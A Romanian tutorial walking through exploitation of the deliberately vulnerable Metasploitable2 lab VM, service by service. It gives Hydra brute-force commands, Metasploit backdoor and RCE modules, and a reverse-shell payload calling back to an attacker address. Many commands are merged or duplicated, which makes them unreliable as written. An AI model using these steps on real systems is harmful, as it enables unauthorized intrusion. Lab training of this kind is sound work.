Metasploitable2 Prezentare completă
Metasploitable este o mașină virtuală Linux vulnerabilă în mod intenționat.
Această mașină virtuală poate fi utilizată pentru a efectua cursuri de instruire în domeniul securității, pentru a testa instrumente de securitate și pentru a exersa tehnici comune de testare a penetrării.
Instalare și configurare
Suntem aici pentru a exploata Metasploitable 2 (Damn machine vulnerabilă pentru teste de penetrare)
Obțineți această mașină Metasploiable2 de la https://information.rapid7.com/download-metasploitable-2017.html
Proces de instalare:
Deschideți VirtualBox și faceți clic pe butonul „New” pentru a crea o nouă mașină virtuală
Tastați numele mașinii virtuale (Metasploitable2)
Alocarea cantității de memorie (de preferat, dar nu mai mică de 512mb)
Selectați Use an existing hard disk file
Selectați fișierul vmdk pe care l-ați descărcat de la Rapid7
Click pe Create…!!! Ați instalat cu succes Metasploitable2, Acum este timpul să configurați setările de rețea.
După instalare modificați setările adaptorului de rețea după cum urmează :
In-Network Setting: Settings/Network/Adapter (Setări/Rețea/Adaptor) Selectați Ethernet sau Wireless
În fila Advanced (Avansat) Selectați: Promiscuous Mode ca Allow All
Reporniți mașina Metasploitable2 și încercați să vă conectați folosind acreditările date pe Banner…!!!!!
Descoperiți adresa IP a mașinii folosind următoarele comandă în terminal
ifconfig
Asta este tot pentru configurare….Să începem hacking-ul…
Scanare
Scanare Matasploitable 2
Așa cum am observat adresa IP a mașinii este 192.168.0.130
Să începem scanarea cu Nmap care face parte din Kali Linux
nmap -sV -p- 192.168.0.130
Exploatarea tuturor porturilor în diferite tehnici :
Metoda 1:
Login cu Anonymous ca nume de utilizator și fără parolă.
Dacă aveți nevoie de mai multe informații despre Anonymous FTP le puteți găsi aici.
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Metoda 2 :
Prin Brute-force folosind Hydra dar trebuie să aveți o listă personalizată de nume de utilizator și parole.
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
Se va lua fiecare nume de utilizator și parolă din fișierele date și va încerca să se conecteze la serviciul FTP țintă.
După ce ați găsit acreditările, vă puteți conecta direct.
După ce vă conectați la un cont de utilizator, puteți obține acces root prin escaladarea privilegiilor.
Metoda 3 :
Exploatarea FTP prin intermediul cadrului Metasploit
deschideți consola cadrului Metasploit și căutați vsftpd Backdoor exploit
msfconsole Search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor
.
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Felicitări, ați obținut acces root
22-SSH
Secure Shell (SSH) este un protocol de rețea criptografic pentru operarea în siguranță a serviciilor de rețea pe o rețea nesecurizată.
Exploatarea SSH în diferite tehnici
Metoda 1
Cravarea numelui de utilizator și a parolei cu Hydra
Hydra este un instrument încorporat în Kali-Linux utilizat pentru Atacul prin forță brută este o metodă de încercare și eroare utilizată de programele de aplicații pentru a decoda date criptate, cum ar fi parolele sau cheile Data Encryption Standard (DES), prin efort exhaustiv (utilizând forța brută), mai degrabă decât prin utilizarea unor strategii intelectuale.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Metoda 2
Deschideți cadrul Metasploit
Deschideți terminalul și tastați aceste comenzi :
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
Setați acest auxiliar și vedeți ce cere.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Setați lista predefinită de nume de utilizator și lista de parole
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
Se va lua pe bază de timp numele de utilizator și lista de parole și va notifica cu numele de utilizator: parola și se va conecta cu aceste acreditări.
ssh username@targetipaddress
Aveți acces de utilizator, nu puteți efectua toate sarcinile, așa că încercați să obțineți acces root prin escaladarea privilegiilor.
23-TELNET
Telnet este un protocol de rețea simplu, bazat pe text, care este utilizat pentru accesarea calculatoarelor de la distanță prin intermediul rețelelor TCP/IP, cum ar fi Internetul. Telnet a fost creat și lansat în 1969 și, din punct de vedere istoric, se poate spune că a fost primul Internet.
telnet <target IP Address> --> 192.168.0.130
În mod implicit se va apuca bannerul Metasploitable 2, se arată că Login with msfadmin/msfadmin to get a start. Doar introduceți aceste credențiale și ați intrat.
25-SMTP
SMTP face parte din stratul de aplicație al protocolului TCP/IP. Folosind un proces numit „store and forward” (stocarea și transmiterea), SMTP deplasează e-mailul dvs. pe și între rețele. Acesta colaborează îndeaproape cu ceea ce se numește Mail Transfer Agent (MTA) pentru a vă trimite comunicarea către computerul și căsuța de e-mail potrivite.
Metoda 1:
Utilizarea lui Metasploit
Porniți Metasploit executând comenzile
service postgresql startmsfconsole -qsearch smtp_version
.
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP înseamnă Simple Mail Transport Protocol (protocolul simplu de transport al corespondenței) și este un server-to-server și păstrează o bază de date locală a utilizatorilor către care trebuie să trimită și să primească e-mailuri.
SMTP are un set de comenzi. Ne vom conecta la ținta noastră cu „netcat” prin portul 25 și vom încerca să achiziționăm această bază de date de emailuri.
Deschideți un nou terminal și tastați:
nc 192.168.0.130 25
Acum conexiunea este stabilită, puteți verifica prin comenzile „SMTP”
Type: vrfy user
vrfy (Aceasta este o comandă nonshell interactiv)
Pentru comenzi SMTP vizitați: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Metoda 2
Utilizarea smtp_enum
Acest lucru poate fi făcut de Metasploit
search smtp_enum
.
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
Această metodă utilizează enumerarea pentru a afla această listă de utilizatori în serviciul SMTP.
Mai târziu, NetCat poate fi de ajutor pentru a obține o conexiune inversă cu acel utilizator.
139&445 Netbios-SSN
Samba este un proiect open-source care este utilizat pe scară largă pe computerele Linux și Unix, astfel încât acestea să poată lucra cu serviciile de fișiere și de imprimare Windows.
Potem utiliza Samba chiar și ca server Active pentru a gestiona logarea, autentificarea și controlul accesului pentru o rețea Windows.
Cercetați exploit
use exploit/multi/samba/usermap_script
.
Pentru a vizualiza opțiunile pentru exploit
show optionsSet RHOST192.168.0.130 (Target IP address)
.
Setează sarcina utilă
Show payloadsSet payload cmd/unix/reverse
Show payloadsSet payload cmd/unix/reverse
Setează argumentele necesare pentru sarcina utilă
.
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Verifică odată ce toate argumentele necesare sunt completate
exploit
1099-Java-RMI
Remote Method Invocation (RMI) este o API care permite unui obiect să invoce o metodă asupra unui obiect care există într-un alt spațiu de adrese, care poate fi pe aceeași mașină sau pe o mașină la distanță.
Exploiting java-RMI-server
cercetați exploit-ul
search java_rmi_server
Alegeți exploit-ul în funcție de rangul lor. de exemplu, „excelent” funcționează mai bine decât „normal”.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Am obținut acces la mașina-țintă.
1524-BINDSHELL
Bind shell este un tip de shell în care mașina-țintă deschide un port de comunicare sau un listener pe mașina victimă și așteaptă o conexiune de intrare. Atacatorul se conectează apoi la ascultătorul de pe mașina victimă, ceea ce duce apoi la executarea de coduri sau comenzi pe server.
Exploatare
Este un shell root, astfel încât ne putem conecta prin serviciul netcat.
nc <target ip address> 1524
Felicitări, Sunteți un utilizator root acum.
2121-ProFTPD
Înainte de a exploata acest port trebuie să aveți acreditările de conectare, așa cum știm metoda obțineți-o prin tehnica Brute-force, Putem accesa ProFTPd cu telnet, Folosim aici user: user.
telnet <Taget IP Address> <Port Number>USER <username> PASS <password>
Este un utilizator normal, Încercați escaladarea privilegiilor pentru a obține controlul root.
3306-MYSQL
Metoda 1:
Căutați exploit-ul
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
.
Cîteodată ar putea exista o șansă de a avea o parolă goală pentru MySQL. Așa că o putem exploata direct.
Nota: în mod implicit, arată BLANK_PASSWORDS ca fiind falsă, setați-o la true.
set BLANK_PASSWORDS as true
Metoda:2
În această metodă, vom exploata MySQL prin utilizarea acestei comenzi, furnizând numele de utilizator ca root și IP-ul țintei.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc este un instrument pentru accelerarea compilării codului sursă prin utilizarea calculului distribuit într-o rețea de calculatoare. Cu o configurație corectă
distcc poate reduce drastic timpul de compilare a unui proiect
Exploatarea portului 3632 folosind distcc-exec
Deschideți msfconsole și căutați distcc_exec
search distcc_execshow options
Setați argumentele necesare pentru a exploata
set RHOSTS <target-ip>exploit
Avem acces la Shell…încercați să faceți escaladarea privilegiilor pentru privilegii mai mari
Exploatarea PostgreSQL cu postgre_payload
Deschideți msfconsole & căutați postgres_payload
.
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Setați argumentele necesare pentru exploit
set RHOSTS <target-ip>
În mod implicit, se va folosi numele de utilizator ca fiind postgres
exploit
Succesfully logged in postgresql…Să obținem un shell pentru a face mai multe lucruri…
Încercați să faceți o escaladare de privilegii…Învățare fericită..!!!
5900-VNC
Deschideți msfconsole și căutați exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
.
Această metodă este utilizată pentru a exploata software-ul VNC găzduit pe sisteme de operare Linux sau Unix sau Windows cu vulnerabilitate de autentificare.
Încercați să vă conectați vnc cu acea parolă
Deschideți Vnc Viewer în Terminal & Tastați adresa IP și conectați-vă
a login prompt popup și cere să se furnizeze acreditările
Apoi introduceți parola și faceți clic pe OK.
Voilaaa…!!!! ai Acces…Știu la ce te gândești chiar acum…Nu te juca cu lucrurile din jur..Happy Learning.
6000-X11
Sistemul X Window (aka X) este un sistem de ferestre pentru afișaje bitmap, care este comun pe sistemele de operare bazate pe UNIX. X oferă cadrul de bază pentru un mediu bazat pe GUI.
Serverul X11 la distanță acceptă conexiuni de oriunde se poate obține o conexiune la Internet. Acesta este responsabil pentru accesul la plăcile grafice, la dispozitivele de intrare și la ecranul de afișare pe oricare dintre calculatoare sau dispozitive fără fir.
Exploatarea portului 6000 folosind ssh
ssh -X -l msfadmin 192.168.0.122
În comanda de mai sus, ‘X’ activează toate porturile de redirecționare, furnizând numele de utilizator și IP-ul țintei ne oferă shell-ul
6667 & 6697 UnrealIRCD
UnrealIRCd este un server IRC cu sursă deschisă, care deservește mii de rețele din 1999. Rulează pe Linux, OS X și Windows
UnrealIRCd este un IRCd foarte avansat, cu un accent puternic pe modularitate, un fișier de configurare avansat și foarte ușor de configurat. Caracteristicile cheie includ SSL
UnrealIRCd este unul dintre cele mai populare și complete daemoni IRC și este folosit pe cel mai mare număr de servere IRC
Acest server este descris ca având probabil cele mai multe caracteristici de securitate dintre toate serverele IRC.
Protocoale folosite: Internet Relay Chat
Să exploatăm acest server IRC.
Metoda 1: pe portul 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Stabilește argumentele necesare pentru exploatare
set RHOSTS <target-ip>
.
în mod implicit, numărul de port 6667 este atribuit lui exploit
run (or) exploit
Heyyy…Avem rădăcină…Trăim pe muchie de cuțit…
Metoda 2: Pe portul 6697
Utilizați exploit-ul de mai sus și setați argumentele necesare
De data aceasta setați portul ca fiind 6697
set RHOSTS <target-ip>set RPORT 6697
Și a doua oară, de asemenea, am obținut root…Încercați să exploatați acest lucru…Happy learning
818080-TOMCAT
Apache Tomcat este o implementare open-source a tehnologiilor Java Servlet, JavaServer Pages, Java Expression Language și WebSocket. Tomcat oferă un mediu de server web HTTP „pur Java” în care poate rula cod Java.
Exploatarea Apache-Tomcat
Se poate realiza în doi pași:
Deschideți msfconsole & căutați tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Exploitul va atribui nume de utilizator implicit & liste de parole. După setarea argumentelor pentru exploit Tip exploit (sau) executați
run
Se iau același nume de utilizator și aceeași parolă și se dau la următorul exploit.
cercetați Tomcat Manager Exploits
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Setați RHOSTS, RPORT, și HttpPassword, HttpUsername pe care le-am obținut din Tomcat login exploit și apoi rulați exploit-ul.
msfconsole ar putea atribui sarcina utilă adecvată pentru un exploit, De aceea avem meterpreter…
8787-Ruby-drb
dRuby este un sistem distribuit de obiecte pentru Ruby. Este scris în Ruby pur și folosește protocolul său.
Nu sunt necesare servicii suplimentare în afară de cele furnizate de timpul de execuție Ruby, cum ar fi socket-urile TCP.
search drb_remote_codeexec
Setați argumentele necesare pentru a exploata
show optionsset RHOSTS <target-ip>exploit (or) run
Felicitări că ați obținut acces shell root…încercați să folosiți câteva comenzi shell.
.